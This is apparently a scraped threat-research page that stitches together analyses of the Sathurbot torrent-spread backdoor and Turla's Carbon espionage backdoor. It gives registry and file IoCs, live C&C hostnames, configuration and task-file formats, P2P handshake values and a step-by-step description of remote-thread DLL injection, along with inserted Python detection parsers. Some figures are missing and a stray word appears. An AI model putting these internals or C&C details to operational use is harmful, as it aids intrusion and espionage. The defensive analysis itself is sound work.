HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\0TheftProtectionDll = {GUID1}
HKLM\SOFTWARE\Classes\CLSID\{GUID1} = “Windows Theft Protection”
HKLM\SOFTWARE\Classes\CLSID\{GUID1}\InprocServer32 = “C:\\ProgramData\\Microsoft\\Performance\\TheftProtection\\TheftProtection.dll”
HKLM\SOFTWARE\Classes\CLSID\{GUID1}\InprocServer32\ThreadingModel = “Apartment”

HKLM\SOFTWARE\Classes\CLSID\{GUID2}

The {GUID2} entries are variable across samples and have 6 char long subkeys, content is binary type and encrypted – used to store variables, temporary values and settings, IP’s, C&C’s, UID

e.g. {GUID2} entries look like

HKLM\SOFTWARE\Classes\CLSID\{8E577F7E-03C2-47D1-B4C0-BCE085F78F66}\00000003
HKLM\SOFTWARE\Classes\CLSID\{8E577F7E-03C2-47D1-B4C0-BCE085F78F66}\00000002
HKLM\SOFTWARE\Classes\CLSID\{8E577F7E-03C2-47D1-B4C0-BCE085F78F66}\00000001
HKLM\SOFTWARE\Classes\CLSID\{8E577F7E-03C2-47D1-B4C0-BCE085F78F66}\00000009
HKLM\SOFTWARE\Classes\CLSID\{8E577F7E-03C2-47D1-B4C0-BCE085F78F66}\00000011
HKLM\SOFTWARE\Classes\CLSID\{8E577F7E-03C2-47D1-B4C0-BCE085F78F66}\00010001
HKLM\SOFTWARE\Classes\CLSID\{8E577F7E-03C2-47D1-B4C0-BCE085F78F66}\00010002
HKLM\SOFTWARE\Classes\CLSID\{8E577F7E-03C2-47D1-B4C0-BCE085F78F66}\00000008
HKLM\SOFTWARE\Classes\CLSID\{8E577F7E-03C2-47D1-B4C0-BCE085F78F66}\00000007
HKLM\SOFTWARE\Classes\CLSID\{8E577F7E-03C2-47D1-B4C0-BCE085F78F66}\00000004
HKLM\SOFTWARE\Classes\CLSID\{8E577F7E-03C2-47D1-B4C0-BCE085F78F66}\00000010
HKLM\SOFTWARE\Classes\CLSID\{8E577F7E-03C2-47D1-B4C0-BCE085F78F66}\00020001

This article sheds light on the current ecosystem of the Sathurbot backdoor trojan, in particular its use of torrents as a delivery medium and its distributed brute-forcing of weak WordPress administrator accounts. HACKERSCHINA

The torrent leecher

Want to download a movie or software without paying for it? There may be associated risks. It may well happen that your favorite search engine returns links to torrents on sites that normally have nothing to do with file sharing. They may, however, run WordPress and have simply been compromised.

Some examples of search results:

Clicking on those links returns the pages below (note that some even use HTTPS):

The movie subpages all lead to the same torrent file, while all the software subpages lead to another torrent file. When you start torrenting in your favorite BitTorrent client, you find the file is well seeded and thus appears legitimate. If you download the movie torrent, its content is a file with a video extension accompanied by an apparent codec-pack installer and an explanatory text file. The software torrent contains an apparent installer executable and a small text file. The aim of both is to get the victim to run the executable, which loads the Sathurbot DLL.

After you start the executable, you are shown a message like this:

While you ponder your options, bad things start happening in the background. You have just become a bot in the Sathurbot network.

Backdoor and downloader

On startup, Sathurbot retrieves its C&C with a DNS query. The response comes as a DNS TXT record. Its hex string value is decrypted and used as the C&C domain name for status reporting, task retrieval and obtaining links to other malware downloads.

Sathurbot can update itself and download and start other executables. We have seen variants of Boaxxe, Kovter and Fleercivet, but this is not necessarily an exhaustive list.

Sathurbot then reports its successful installation along with a listening port to the C&C. Periodically it reports to the C&C that it is alive and well, waiting for additional tasks.

Web crawler

Sathurbot comes with some 5,000-plus basic generic words. These are randomly combined into 2-4 word phrases used as query strings for the Google, Bing and Yandex search engines.

From the web pages at each of those search-result URLs, a random 2-4 word text chunk is selected (this time possibly more meaningful, as it comes from real text) and used for the next round of search queries.

Finally, the second set of search results (up to the first three pages) is harvested for domain names.

The extracted domain names are then all probed for having been created with the WordPress framework. The trick here is to check the response to the URL http://[domain_name]/wp-login.php.

Afterwards the root index page of the domain is fetched and probed for the presence of other frameworks, namely Drupal, Joomla, PHP-NUKE, phpFox and DedeCMS.

On startup, or at certain time intervals, the harvested domains are sent to the C&C (a different, hardcoded domain from the one used by the backdoor).

Distributed WordPress password attack

The client is now ready to receive a list of domain access credentials (formatted as login:password@domain) to probe for passwords. Different bots in the Sathurbot botnet try different login credentials for the same site. Each bot attempts only a single login per site and moves on. This design helps ensure that the bot's IP address does not get blacklisted by any targeted site and that it can revisit the site in the future.

During our testing, lists of 10,000 items to probe were returned by the C&C.

For the attack itself, the WordPress XML-RPC API is used; in particular, the wp.getUsersBlogs method is abused. A typical request looks like:

The sequence of probing a number of domain credentials is illustrated in the following figure:

The response is evaluated and the results are posted to the C&C.

Torrent client: seeder

The bot has the libtorrent library integrated, and one of its tasks is to become a seeder: a binary file is downloaded, a torrent created and seeded.

The BitTorrent bootstrap

That completes the cycle from leecher to involuntary seeder:

Note: not every bot in the network performs all the functions; some are just web crawlers, some only attack the XML-RPC API, and some do both. Also, not every bot appears to be seeding a torrent.

Impact

The above-mentioned attempts on /wp-login.php from a multitude of users, even against websites that do not host WordPress, are the direct impact of Sathurbot. Many web admins observe this and wonder why it is happening. In addition, WordPress sites can see the potential attacks on wp.getUsersBlogs in their logs.

Through examination of logs, system artifacts and files, the botnet is found to consist of over 20,000 infected computers and to have been active since at least June 2016.

Occasionally we have also seen torrent links sent by email.

Detection

Web admins: check for unknown subpages and/or directories on the server. If they contain any references to torrent download offers, check the logs for attacks and possible backdoors.

Users: run Wireshark with the filter http.request and no web browser open, to see whether there are too many requests like GET /wp-login.php and/or POST /xmlrpc.php. Alternatively, check for the files or registry entries listed in the IoC section below.

ESET users are protected from this threat on multiple levels.

Removal

Web admins: change passwords, remove subpages not belonging to the site, and optionally wipe and restore the site from a backup.

Users: using a third-party file manager, find the suspect .DLL (note that the files and directories have the hidden attribute set), open Process Explorer or Task Manager, kill explorer.exe and/or rundll32.exe, delete (quarantine) the affected .DLL, and reboot.

Note: this removes only Sathurbot, not any other malware it may also have downloaded.

Alternatively, consider a comprehensive anti-malware product, or at least an online scanner.

Prevention

Web admins: if the normal functioning of the website does not require the XML-RPC API, you are advised to disable it, and to use complex passwords.

Users: avoid running executables downloaded from sources other than respected developers, and avoid downloading files from sites not designed primarily as file-sharing sites.

IoCs

Currently, we have observed Sathurbot installing to:

\ProgramData\Microsoft\Performance\Monitor\PerformanceMonitor.dll

\ProgramData\Microsoft\Performance\TheftProtection\TheftProtection.dll

\ProgramData\Microsoft\Performance\Monitor\SecurityHelper.dll

\Users\*****\AppData\Local\Microsoft\Protect\protecthost.dll

It runs in the context of the rundll32.exe or explorer.exe process and locks files and registry keys from editing. Both 32-bit and 64-bit versions are present in the installer.

Subfolders of the above (contain the files seeded by torrent)
\SecurityCache\cache\resume\
\SecurityCache\cache\rules\
\SecurityCache\data\
\SecurityCache\zepplauncher.mif – contains the DHT nodes
\temp\

%appdata%\SYSHashTable\ – contains folders representing the hashes of visited domains
%appdata%\SYSHashTable\SyshashInfo.db – collection of interesting domains found, including framework info

Carbon Paper: Peering into Turla’s second stage backdoor

The Turla espionage group has been targeting various institutions for many years. Recently, we found several new versions of Carbon, a second stage backdoor in the Turla group arsenal. Last year, a technical analysis of this component was made by Swiss GovCERT.ch as part of their report detailing the attack that a defense firm owned by the Swiss government, RUAG, suffered in the past.

This blog post highlights the technical innovations that we found in the latest versions of Carbon we have discovered.

Looking at the different version numbers of Carbon we have, it is clear that it is still under active development. Through the internal versions embedded in the code, we see that new versions are pushed out regularly. The group is also known to change its tools once they are exposed. As such, we have seen that between two major versions, mutexes and file names are changed.

Infection vectors

The Turla group is known to be painstaking and work in stages, first doing reconnaissance on their victims’ systems before deploying their most sophisticated tools such as Carbon.

A classic Carbon compromise chain starts with a user receiving a spearphishing email or visiting a previously compromised website, typically one that the user visits regularly — a technique known as a watering hole attack.

After a successful attack, a first stage backdoor — such as Tavdig [1] or Skipper [2] — is installed on the user machine. Once the reconnaissance phase is over, a second stage backdoor, like Carbon, is installed on key systems.

Technical analysis

Carbon is a sophisticated backdoor used to steal sensitive information from targets of interest by the Turla group.

This malware shares some similarities with “Uroburos” [3], a rootkit used by the same group. The most relevant resemblance is the communication framework. Indeed, both of them provide communication channels between different malware components. The communication objects are implemented in the same way; the structures and vtables look identical except that there are fewer communication channels provided in Carbon. Indeed, Carbon might be a “lite” version of Uroburos (without kernel components and without exploits).

For the Turla group to decide to install Carbon on a system, a (stage 1) reconnaissance tool is usually delivered first to the target: this tool collects several pieces of information about the victim’s machine and its network (through Tavdig or Skipper, for example). If the target is considered interesting enough, it will receive more sophisticated malware (such as Carbon or Uroburos).

Global architecture

The Carbon framework consists of:

  • a dropper that installs the Carbon components and its configuration file
  • a component that communicates with the C&C
  • an orchestrator that handles the tasks, dispatches them to other computers on the network and injects into a legitimate process the DLL that communicates with the C&C
  • a loader that executes the orchestrator

Carbon Dating

The orchestrator and the injected library have their own development branch.

Thanks to the compilation dates and the internal version numbers hardcoded in the PE files, we can propose the following timeline:

Table 1 – Carbon development timeline

Carbon files

The files from the Carbon framework can have different names depending on the version but they all keep the same internal name (from the metadata) regardless of the version:

  • the dropper: “SERVICE.EXE”
  • the loader: “SERVICE.DLL” or “KmSvc.DLL”
  • the orchestrator: “MSIMGHLP.DLL”
  • the injected library: “MSXIML.DLL”

Each of these files exists in 32-bit and 64-bit versions.

Working directory

Several files are created by Carbon to keep logs, tasks to execute and configuration that will modify the malware’s behavior. The contents of the majority of these files are encrypted with the CAST-128 algorithm[4].

A base working directory will contain the files/folders related to Carbon. This directory is chosen randomly among the folders in %ProgramFiles% but excluding “WindowsApps”.

The filenames are hardcoded in the orchestrator. The same names are used in the 3.7x+ branch. Because the injected library accesses the same files as the orchestrator, it is another easy way to link a library version and an orchestrator.

Carbon 3.7x files tree view:
%carbon_working_folder%   // base folder
├── 0208 // tasks results and logs files
│   ├── C_56743.NLS // contains list of files to send to the C&C server, this file is neither compressed nor encrypted
├── asmcerts.rs
├── getcerts.rs
├── miniport.dat  // configuration file
├── msximl.dll    // injected library (x32)
├── Nls // contains tasks (commands to be executed or PE file) and their configuration files
│   ├── a67ncodc.ax  // tasks to be executed by the orchestrator
│   ├── b9s3coff.ax  // tasks to be executed by the injected library
├── System   // plugins folder
│   ├── bootmisc.sdi // not used
├── qavscr.dat    // error log
├── vndkrmn.dic   // log
└── ximarsh.dll   // injected library (x64)

Since version 3.80, all filenames have changed.

Carbon 3.8x files tree view:
%carbon_working_folder%   // base folder
├── 0409  // contains tasks (commands to be executed or PE file) and their configuration files
│   ├── cifrado.xml    // tasks to be executed by the injected library
│   ├── encodebase.inf // tasks to be executed by the orchestrator
├── 1033 // tasks results and logs files
│   ├── dsntype.gif // contains list of files to send to the C&C server, this file is neither compressed nor encrypted
├── en-US  // plugins folder
│   ├── asmlang.jpg // not used
├── fsbootfail.dat  // error log
├── mkfieldsec.dll  // injected library (x32)
├── preinsta.jpg    // log
├── wkstrend.xml    // configuration file
├── xmlrts.png
└── zcerterror.png

File access

In the case of the majority of the files from the Carbon working folder, when one is accessed by the malware, the following steps are taken:

  • a specific mutex is used to ensure its exclusive access.
  • the file is decrypted (CAST-128)
  • when the operations on the file are done, the file is reencrypted (CAST-128)
  • the mutex is released

Mutexes

The following mutexes are created by the orchestrator in Carbon 3.7x:

  • “Global\\MSCTF.Shared.MUTEX.ZRX” (used to ensure exclusive access to “vndkrmn.dic”)
  • “Global\\DBWindowsBase” (used to ensure exclusive access to “C_56743.NLS”)
  • “Global\\IEFrame.LockDefaultBrowser” (used to ensure exclusive access to “b9s3coss.ax”)
  • “Global\\WinSta0_DesktopSessionMut” (used to ensure exclusive access to “a67ncodc.ax”)
  • “Global\{5FA3BC02-920F-D42A-68BC-04F2A75BE158}” (used to ensure exclusive access to new files created in “Nls” folder)
  • “Global\\SENS.LockStarterCacheResource” (used to ensure exclusive access to “miniport.dat”)
  • “Global\\ShimSharedMemoryLock” (used to ensure exclusive access to “asmcerts.rs”)

In Carbon 3.8x, the filenames and the mutex names have changed:

  • “Global\\Stack.Trace.Multi.TOS” (used to ensure exclusive access to “preinsta.jpg”)
  • “Global\\TrackFirleSystemIntegrity” (used to ensure exclusive access to “dsntype.gif”)
  • “Global\\BitswapNormalOps” (used to ensure exclusive access to “cifrado.xml”)
  • “Global\\VB_crypto_library_backend” (used to ensure exclusive access to “encodebase.inf”)
  • “Global\{E41B9AF4-B4E1-063B-7352-4AB6E8F355C7}” (used to ensure exclusive access to new files created in “0409” folder)
  • “Global\\Exchange.Properties.B” (used to ensure exclusive access to “wkstrend.xml”)
  • “Global\\DatabaseTransSecurityLock” (used to ensure exclusive access to “xmlrts.png”)

These mutexes are also used in the injected dll to ensure that the orchestrator has been executed.

Configuration File

The configuration file affects the malware’s behavior. The file format is similar to the “inf” files used by Windows. Among other things, it contains:

  • an “object_id” that is a unique UUID used to identify the victim; when the value is not set in the file, it is generated randomly by the malware
  • a list of processes into which code is injected (iproc)
  • the frequency and time for task execution / backup logs / connection to the C&C ([TIME])
  • the IP addresses of other computers on the network ([CW_LOCAL])
  • the C&C server addresses ([CW_INET])
  • the named pipes used to communicate with the injected library and with the other computers ([TRANSPORT])

This file might be updated later. Indeed, in the communication library, some cryptographic keys are used to encrypt/decrypt data and these keys are retrieved from a section [CRYPTO] in the configuration file that does not exist when the file is dropped from the loader resources.

Carbon 3.77 configuration file:
[NAME]
object_id=
iproc = iexplore.exe,outlook.exe,msimn.exe,firefox.exe,opera.exe,chrome.exe
ex = #,netscape.exe,mozilla.exe,adobeupdater.exe,chrome.exe
[TIME]
user_winmin = 1800000
user_winmax = 3600000
sys_winmin = 3600000
sys_winmax = 3700000
task_min = 20000
task_max = 30000
checkmin = 60000
checkmax = 70000
logmin =  60000
logmax = 120000
lastconnect=111
timestop=
active_con = 900000
time2task=3600000
[CW_LOCAL]
quantity = 0
[CW_INET]
quantity = 3
address1 = doctorshand.org:80:/wp-content/about/
address2 = www.lasac.eu:80:/credit_payment/url/
address3 = www.shoppingexpert.it:80:/wp-content/gallery/
[TRANSPORT]
system_pipe = comnap
spstatus = yes
adaptable = no
[DHCP]
server = 135
[LOG]
logperiod = 7200
[WORKDATA]
run_task=
run_task_system=
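Because the configuration file is an INI-style text once decrypted, an analyst can pull the operationally useful fields (C&C addresses from [CW_INET], injection targets from iproc, the named pipe from [TRANSPORT], and whether a [CRYPTO] section has been added yet) with the standard library. The following Python is an added example, not ESET's tooling or the malware's own parser; the sample it parses is the Carbon 3.77 configuration shown above, reflowed one key per line, and the address format host:port:path is taken from those lines.

```python
import configparser

# The Carbon 3.77 configuration shown on the page, one key per line.
CARBON_CONFIG = """\
[NAME]
object_id=
iproc = iexplore.exe,outlook.exe,msimn.exe,firefox.exe,opera.exe,chrome.exe
ex = #,netscape.exe,mozilla.exe,adobeupdater.exe,chrome.exe
[TIME]
user_winmin = 1800000
user_winmax = 3600000
task_min = 20000
task_max = 30000
lastconnect=111
timestop=
time2task=3600000
[CW_LOCAL]
quantity = 0
[CW_INET]
quantity = 3
address1 = doctorshand.org:80:/wp-content/about/
address2 = www.lasac.eu:80:/credit_payment/url/
address3 = www.shoppingexpert.it:80:/wp-content/gallery/
[TRANSPORT]
system_pipe = comnap
spstatus = yes
adaptable = no
[LOG]
logperiod = 7200
[WORKDATA]
run_task=
run_task_system=
"""


def load_config(text: str) -> configparser.ConfigParser:
    # Only '=' separates keys from values here; the default ':' delimiter would
    # otherwise be ambiguous with the host:port:path addresses.
    cfg = configparser.ConfigParser(interpolation=None, delimiters=("=",))
    cfg.optionxform = str  # keep key case exactly as written in the file
    cfg.read_string(text)
    return cfg


def split_list(value: str):
    return [v.strip() for v in value.split(",") if v.strip()]


def c2_addresses(cfg: configparser.ConfigParser):
    """[CW_INET]: 'quantity' entries named addressN, each host:port:path."""
    if not cfg.has_section("CW_INET"):
        return []
    sect = cfg["CW_INET"]
    out = []
    for i in range(1, int(sect.get("quantity", "0")) + 1):
        raw = sect.get(f"address{i}", "")
        if not raw:
            continue  # tolerate a quantity larger than the entries present
        host, port, path = raw.split(":", 2)
        out.append({"host": host, "port": int(port), "path": path})
    return out


def summarize(text: str) -> dict:
    cfg = load_config(text)
    name = cfg["NAME"] if cfg.has_section("NAME") else {}
    transport = cfg["TRANSPORT"] if cfg.has_section("TRANSPORT") else {}
    return {
        "object_id": name.get("object_id", "") or None,   # empty => generated at runtime
        "iproc": split_list(name.get("iproc", "")),
        "ex": split_list(name.get("ex", "")),              # meaning of leading '#' not documented
        "c2": c2_addresses(cfg),
        "pipe": transport.get("system_pipe"),
        "has_crypto": cfg.has_section("CRYPTO"),            # added later by the communication library
    }


if __name__ == "__main__":
    for k, v in summarize(CARBON_CONFIG).items():
        print(f"{k}: {v}")
```

The extracted hosts and paths are the indicators worth feeding into proxy logs; note that they are full URL prefixes on compromised legitimate sites, so block on host plus path rather than on the domain alone where the business depends on those sites.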

Logfile

The Carbon framework includes a logfile that is used to log actions performed by the malware and information on the system that can be useful to the malware operator (for example if an analysis tool such as WireShark is running on the machine).

The log’s format has not changed since Carbon 3.71:

  • Date|Time|Object-Id|Source|Message

Example:
[LOG]
start=1
20/02/17|12:48:24|8hTdJtUBB57ieReZAOSgUYacts|s|OPER|New object ID generated '8hTdJtUBB57ieReZAOSgUYacts'|
20/02/17|12:48:24|8hTdJtUBB57ieReZAOSgUYacts|s|ST|3/81|0|
20/02/17|12:48:24|8hTdJtUBB57ieReZAOSgUYacts|s|START OK

This file is periodically backed up and sent to the C&C.

Dropper

The dropper is the only executable that is not a DLL. It is the first PE file to be executed: it is used to extract the other components from its resources.

The PE files that are used to load the main components are extracted into the Windows system directory while the orchestrator, the library used to communicate with the C&C and the configuration file are extracted into the Carbon working directory.

A new section is appended to a random “.inf” file from %SystemRoot%\INF. The section’s name is the volume serial number of the compromised machine’s disk, and a value “root” is created with the chosen Carbon working directory.

Example:
[5049654F]
root="C:\Program Files\Windows Portable Devices"
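That marker is cheap to hunt for: a legitimate INF never has a section named by an eight-hex-digit volume serial with a "root" value pointing into %ProgramFiles%. The following Python is an added example, not ESET's tooling; it scans a directory of .inf files for such sections and reports the working folder each one names. The sample directory it builds is constructed, with one ordinary-looking INF and one carrying the marker shown above.

```python
import os
import re
import tempfile

SECTION_RE = re.compile(r"^\s*\[([^\]]+)\]\s*$")
ROOT_RE = re.compile(r'^\s*root\s*=\s*"?([^"\r\n]+?)"?\s*$', re.IGNORECASE)
SERIAL_RE = re.compile(r"^[0-9A-Fa-f]{8}$")  # volume serial numbers are 32-bit hex


def scan_inf_file(path: str):
    """Return [(file, section, root)] for sections that look like the Carbon marker."""
    hits = []
    current = None
    with open(path, "r", encoding="utf-8", errors="replace") as fh:
        for line in fh:
            m = SECTION_RE.match(line)
            if m:
                current = m.group(1).strip()
                continue
            # Only a 'root' value inside a serial-number-named section counts;
            # 'root' keys under [Strings] or similar are ignored.
            if current and SERIAL_RE.match(current):
                r = ROOT_RE.match(line)
                if r:
                    hits.append((os.path.basename(path), current, r.group(1)))
    return hits


def scan_inf_dir(directory: str):
    hits = []
    for name in sorted(os.listdir(directory)):
        if name.lower().endswith(".inf"):
            hits.extend(scan_inf_file(os.path.join(directory, name)))
    return hits


def build_sample_inf_dir() -> str:
    """Constructed sample: a benign INF and one with the appended marker section."""
    d = tempfile.mkdtemp(prefix="inf_sample_")
    with open(os.path.join(d, "keyboard.inf"), "w") as fh:
        fh.write('[Version]\nSignature="$Windows NT$"\nClass=Keyboard\n'
                 '[Strings]\nroot="unused"\n')
    with open(os.path.join(d, "usbport.inf"), "w") as fh:
        fh.write('[Version]\nSignature="$Windows NT$"\n[Manufacturer]\n%Msft%=Microsoft\n'
                 '[5049654F]\nroot="C:\\Program Files\\Windows Portable Devices"\n')
    return d


if __name__ == "__main__":
    for f, section, root in scan_inf_dir(build_sample_inf_dir()):
        print(f"{f}: section [{section}] points Carbon working folder to {root}")
```

On a live host point scan_inf_dir at %SystemRoot%\INF; the directory is large, which is exactly why the dropper hides the marker there, but the scan is line-oriented and finishes quickly.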

Loader

This part of the component is used to load the orchestrator.

A service that ensures Carbon’s persistence is created. Its name can be “srservice”, “ipvpn” or “hkmsvc”, depending on the operating system version running on the compromised machine.

The Carbon working directory is retrieved by walking through the “%windir%\inf” folder and looking for the file that contains the Carbon base path.

Last but not least, the function “ModuleStart” (in Carbon 3.71) or “ModStart” (since Carbon 3.77) from the orchestrator (located in the Carbon base folder) is called.

Orchestrator

The orchestrator is the main component of the Carbon framework. It is mainly used to inject code into a process that communicates legitimately over the Internet and to dispatch the tasks received from the injected library to other computers on the same network either through named pipes or TCP.

Seven threads are created by the malware. It is easy to identify Carbon’s characteristics because each thread has a specific role:

Configuration fetching

Because the configuration file can be updated by the malware, some attributes like the C&C server addresses are monitored every 10 minutes.

Check Carbon storage folder periodically

There is a storage folder located in the Carbon working directory. This folder contains some files downloaded from the C&C server (tasks that are either commands to be executed or PE files, and their configuration files).

This thread runs continuously and checks every two hours [5] whether there is still enough space available in this folder; if not, a notification is written into the logfile.

Task execution

The execution of the tasks in the context of the orchestrator process is very similar to the way in which it is performed in the communication library (cf Communication library / Tasks execution).

Unlike the communication library, it is the file “encodebase.inf” (for Carbon v3.8x) or “a67ncode.ax” that contains the list of the tasks to execute.

Each line of this file is composed in the following way:

  • task_id | task_filepath | task_config_filepath | task_result_filepath | task_log_filepath | [execution_mode | username | password]

The first five fields are required, while the last three are optional. If the field “execution_mode” exists, its value affects the way the task is executed:

  • 0 or 1: normal execution
  • 2: the task is executed in the security context of a specific user (credentials are provided through the username/password fields)
  • 3 or 4: the task is executed in the security context of the user represented by the “explorer.exe” token
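
An added parser (example code, not from the original analysis) for the orchestrator task-list lines described above and for the log records whose format is given under the logfile section earlier: it treats the optional fields and execution_mode values exactly as listed, and the log sample is the one shown earlier, used verbatim.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Meaning of the optional execution_mode field, as listed above.
EXEC_MODES = {
    0: "normal", 1: "normal",
    2: "as the user given in the username/password fields",
    3: "explorer.exe token", 4: "explorer.exe token",
}


@dataclass
class CarbonTask:
    task_id: str
    task_path: str
    config_path: str
    result_path: str
    log_path: str
    execution_mode: Optional[int] = None
    username: Optional[str] = None
    password: Optional[str] = None

    def mode_description(self) -> str:
        if self.execution_mode is None:
            return "normal (no execution_mode field)"
        return EXEC_MODES.get(self.execution_mode,
                              "unknown mode %d" % self.execution_mode)


def parse_task_line(line: str) -> CarbonTask:
    """One task-list line: five mandatory fields, then optionally
    execution_mode, username and password."""
    fields = [f.strip() for f in line.strip().split("|")]
    if not 5 <= len(fields) <= 8:
        raise ValueError("expected 5 to 8 fields, got %d" % len(fields))
    task = CarbonTask(*fields[:5])
    if len(fields) >= 6:
        task.execution_mode = int(fields[5])
    if len(fields) >= 7:
        task.username = fields[6]
    if len(fields) == 8:
        task.password = fields[7]
    if task.execution_mode == 2 and not (task.username and task.password):
        raise ValueError("execution_mode 2 requires username and password")
    return task


@dataclass
class LogRecord:
    date: str
    time: str
    object_id: str
    source: str
    message: str  # everything after the fourth '|', pipes included


# Records are written back to back on one line; each starts with a
# dd/dd/dd|hh:mm:ss| stamp, so split on that boundary (zero-width lookahead).
RECORD_START = re.compile(r"(?=\d{2}/\d{2}/\d{2}\|\d{2}:\d{2}:\d{2}\|)")
RECORD_HEAD = re.compile(r"^\d{2}/\d{2}/\d{2}\|")


def split_log_records(stream: str) -> List[LogRecord]:
    records = []
    for chunk in RECORD_START.split(stream):
        chunk = chunk.strip().rstrip("|")
        if not RECORD_HEAD.match(chunk):
            continue  # leading junk such as the "[LOG]start=1" prefix
        parts = chunk.split("|", 4)
        if len(parts) == 5:
            records.append(LogRecord(*parts))
    return records


# The log sample shown earlier in this section, verbatim.
SAMPLE_LOG = (
    "[LOG]start=120/02/17|12:48:24|8hTdJtUBB57ieReZAOSgUYacts|s|OPER|"
    "New object ID generated '8hTdJtUBB57ieReZAOSgUYacts'|"
    "20/02/17|12:48:24|8hTdJtUBB57ieReZAOSgUYacts|s|ST|3/81|0|"
    "20/02/17|12:48:24|8hTdJtUBB57ieReZAOSgUYacts|s|START OK"
)
```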

P2P

Like Uroburos/Snake, Carbon can dispatch tasks to other computers from the same network via named pipe or TCP. It is useful to be able to dispatch and execute tasks on computers that do not have Internet access.

Communication channels

Uroburos used several types of communication transports that can be categorized as follows:

  • type 1: TCP
  • type 2: enc, np, reliable, frag, m2b, m2d
  • type 3: t2m
  • type 4: UDP, doms, domc

Carbon uses a reduced number of communication channels:

  • type 1: TCP, b2m
  • type 2: np, frag, m2b

The data sent to peers are usually fragmented and transported either over TCP or via a named pipe. If, for example, fragmented data are sent from one computer to another over a named pipe, a “frag.np” object is set up. In this case the constructor of the parent class “frag” is called first, followed by the constructor of the subclass “np”.

For each object there is a structure composed of several handlers: initialize communication, connect (to a pipe / IP address), read data, send data etc.

How a task is forwarded to another computer

Several steps are performed to send data from one computer to another:

  • a communication channel is created (frag.np or frag.tcp object) with a specific named pipe / ip address
  • options are given to the communication object (for example: the fragment size, information about the peer etc.)
  • connection to the peer
  • an authentication step is performed between the host and the peer:
    • there is a handshake process where the host is sending the “magic” value “A110EAD1EAF5FA11” and expects to receive “C001DA42DEAD2DA4” from the peer
    • a command “WHO” is sent to the peer where the host sends the victim uuid and expects to receive the same uuid
  • if the authentication was successful, the data are sent to the peer

All the communication between the host and the peer is encrypted with CAST-128.

Note that this P2P feature is also implemented in the communication DLL.

Plugins

This malware supports additional plugins to extend its functionalities.

In the configuration file, there is a section named “PLUGINS”. It might not exist when the configuration file is dropped from the loader resources but this file can be updated by the malware. The section “PLUGINS” contains a line formed this way:

  • %plugin_name%=%enabled%|%mode%[:%username%:%password%]|%file_path%

%file_path% can be either the path to a PE file or to a file containing a command line to be executed. %enabled% is a string that is used to know if the plugin has to be executed. If it is the case, that string value is “enabled”.

The attribute %mode% is used to control the context in which to execute the PE file/command line. It can be either:

  • 1 = execution with current user privilege in the current process context through CreateProcess().
  • 2 = execution as the user specified in the configuration (:%username%:%password% attributes), the token of this specific user is retrieved through the LogonUserAs() function.
  • 3 = execution in the security context of the user represented by the “explorer.exe” token (the token of the “explorer.exe” process is duplicated and passed to the CreateProcessAsUser() function).
  • 4 = similar to 3, but the environment variables of the user represented by the “explorer.exe” token are also retrieved and passed to the CreateProcessAsUser() function.

If it is a PE file:

  • the file is loaded into the malware process memory
  • the module is parsed to check if it is a DLL
  • if the module is a DLL and exports a function “ModStart” (since Carbon 3.77) or “ModuleStart” (for older versions of Carbon), a new thread is created to execute this function.
  • if the module is not a DLL but a valid PE, it is executed from the entry point.

Injection of the communication library into remote processes

The library that is used to communicate with the C&C server is injected into remote processes. In order to know where to inject this DLL, the configuration file is parsed. The section “[NAME]” contains a field “iproc” holding a list of processes that can legitimately communicate with the Internet.

Example:
[NAME]iproc = iexplore.exe,outlook.exe,msimn.exe,firefox.exe,opera.exe,chrome.exe

For each process on the list that is running on the system, if its parent process name is either “explorer.exe” or “ieuser.exe”, the DLL will be injected into this process.

The process injection is very classical:

  • the functions “CreateToolhelp32Snapshot / Module32FirstW / Module32NextW” are used to retrieve the base address of the module “kernel32.dll”
  • the module EAT is parsed to get the address of the function “LoadLibraryW”
  • the privilege “SeDebugPrivilege” is enabled for the current process
  • memory is allocated into the remote process and the library path is written into it
  • NtCreateThreadEx, or CreateRemoteThread if the address of the first function cannot be retrieved, is called to execute LoadLibraryW and so load the DLL into the memory of the remote process

Communication library

The following analysis is based on the version 4.x of msximl. This component may have changed in the latest versions.

Configuration fetching

Besides the code in the “Configuration fetching” thread from the orchestrator (which is similar), a field “sethttp1” is retrieved from the [TRANSPORT] section.

If this value is set, HTTP 1.1 will be used for future connections.

Tasks execution

The tasks are retrieved from the C&C server.

The tasks to be executed by the communication library are listed in the file “b9s3coff.ax” (for Carbon v3.7x) or “cifrado.xml” (for Carbon v3.8x).

Each line of this file is composed in the following way:

  • task_id | task_filepath | task_config_filepath | task_result_filepath | task_log_filepath

The task file and its config are decrypted (CAST-128) and the task executed. Some options are retrieved from the Carbon configuration file: “time2task” sets a timeout for the task execution (1 hour by default), while “task_min” and “task_max” bound the random delay between the execution of the tasks on the task list (the delay is chosen between “task_min” and “task_max”). These parameters come from the section [TIME].

If the task is a valid DLL file, it is loaded into the current process memory and a new thread is created to execute its “start” export. Otherwise, it is probably a command to execute. In this case, the configuration file is parsed. Like the Carbon configuration file, the task configuration file is formed as a Windows “inf” file and should contain a section [CONFIG] with the following parameters:

  • [CONFIG]
    • NAME (“cmd.exe” by default)
    • ARG
    • RESULT (“stdout” by default)
    • COMPRESSION (“yes” by default)
    • DELETE (“no” by default)

The command with its arguments is executed through CreateProcess() function and the results are stored in the %task_result_filepath% file if the RESULT option is not set to “stdout”, while error or additional info are added to the task logfile.

If the option RESULT is set to stdout:

  • the result task file is deleted and the task execution output is written to the log task file
  • the line “task_id | “1” | task_log_filepath | object_id” is added at the end of the file “C_56743.NLS” (Carbon 3.7x) or “dsntype.gif” (Carbon 3.8x)

Otherwise:

  • the task execution output is written to the task result file and the errors / additional info to the task logfile
  • the line “task_id | “2” | task_log_filepath | task_result_filepath | object_id” is added at the end of the file “C_56743.NLS” (Carbon 3.7x) or “dsntype.gif” (Carbon 3.8x)

In both cases, the same line as written into “C_56743.NLS” is also written into the field “run_task” from the Carbon configuration file. It might be intended as a way for the malware authors to know which is the last task executed when the configuration file is sent to the C&C server (check “Configuration file backup”).

Log rotation

The logfile is backed up and sent to the C&C server periodically (by default this is done every two hours).

Like the backup of the configuration file, this action is performed only during specific times of the day: the log rotation takes place only when the current local time falls within the range defined in the configuration file.

The fields “wh_min” and “wh_max” are retrieved from the [TIME] section of the configuration file (by default: 8 and 20). The thread will execute the code only if the current hour of the day is between %wh_min% and %wh_max%.

